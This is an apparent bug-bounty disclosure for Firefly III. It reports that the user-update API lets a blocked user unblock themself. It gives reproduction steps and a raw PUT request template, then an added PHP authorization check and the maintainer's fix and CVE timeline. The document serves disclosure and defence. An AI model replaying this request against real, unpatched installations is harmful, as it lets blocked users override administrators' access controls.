A User Can Unblock Themself in firefly-iii/firefly-iii


Reported on Jan 13th 2023


PUT /api/v1/users/{id} API doesn't properly check the authorization.

Proof of Concept

  1. [admin] Enable user registration functionality.
  2. [user] Register new user and login as them.
  3. [user] Create OAuth client.
  4. [admin] Block the new user on admin panel.
  5. [user] Send the following request:

         PUT /api/v1/users/{id} HTTP/1.1
         Content-Type: application/x-www-form-urlencoded
         Accept: application/vnd.api+json
         Authorization: Bearer {JWT}
         Cache-Control: no-cache
         Host: localhost:8888
         Accept-Encoding: gzip, deflate
         Connection: close
         Content-Length: 13

  6. [user] Login successfully.


If a user gets blocked, they can unblock themself.
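
One way to enforce the check this report found missing, as an added example that is not Firefly III's code or its fix: a per-request authorization decision for a user-update endpoint that rejects blocked actors and keeps privileged fields admin-only. The function name, the actor array shape and the field names (`blocked`, `blocked_code`, `role`) are assumptions made for the example; the request body is not shown in the report.

```php
<?php
declare(strict_types=1);

// Fields only an administrator may change (names assumed for this example).
const PRIVILEGED_FIELDS = ['blocked', 'blocked_code', 'role'];

/**
 * Decide whether $actor may apply $changes to account $targetId.
 * $actor is ['id' => int, 'is_admin' => bool, 'blocked' => bool].
 * Returns [bool $allowed, string $reason].
 */
function authorizeUserUpdate(array $actor, int $targetId, array $changes): array
{
    // Re-check the block flag on every request: a token issued before the
    // block (steps 3 and 4 above) must stop working once the account is blocked.
    if ($actor['blocked']) {
        return [false, 'actor is blocked'];
    }
    if ($actor['is_admin']) {
        return [true, 'administrator'];
    }
    if ($actor['id'] !== $targetId) {
        return [false, 'not the account owner'];
    }
    // Owners may edit their own profile, but never the privileged fields.
    $denied = array_intersect(array_keys($changes), PRIVILEGED_FIELDS);
    if ($denied !== []) {
        return [false, 'privileged field: ' . implode(', ', $denied)];
    }
    return [true, 'owner, unprivileged fields only'];
}

// Constructed sample actors and requests, not taken from the report.
$admin   = ['id' => 1, 'is_admin' => true,  'blocked' => false];
$user    = ['id' => 2, 'is_admin' => false, 'blocked' => false];
$blocked = ['id' => 2, 'is_admin' => false, 'blocked' => true];

$cases = [
    ['blocked user clears own block', $blocked, 2, ['blocked' => 'false']],
    ['active user edits own block flag', $user, 2, ['blocked' => 'false']],
    ['active user edits own email', $user, 2, ['email' => 'new@example.com']],
    ['active user edits another account', $user, 1, ['email' => 'x@example.com']],
    ['admin unblocks user', $admin, 2, ['blocked' => 'false']],
];
foreach ($cases as [$label, $actor, $targetId, $changes]) {
    [$allowed, $reason] = authorizeUserUpdate($actor, $targetId, $changes);
    printf("%-36s %s (%s)\n", $label, $allowed ? 'ALLOW' : 'DENY', $reason);
}
```

Both checks matter independently: the block check stops a previously issued token from being used at all, and the field allowlist stops an unblocked regular user from changing their own status or role.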

We are processing your report and will contact the firefly-iii team within 24 hours. 3 months ago
We have contacted a member of the firefly-iii team and are waiting to hear back 3 months ago
James Cole
3 months ago


Nice find, valid issue!

James Cole validated this vulnerability 3 months ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
James Cole marked this as fixed in 5.8.0 with commit db0500 3 months ago
James Cole has been awarded the fix bounty
This vulnerability has been assigned a CVE
James Cole published this vulnerability 3 months ago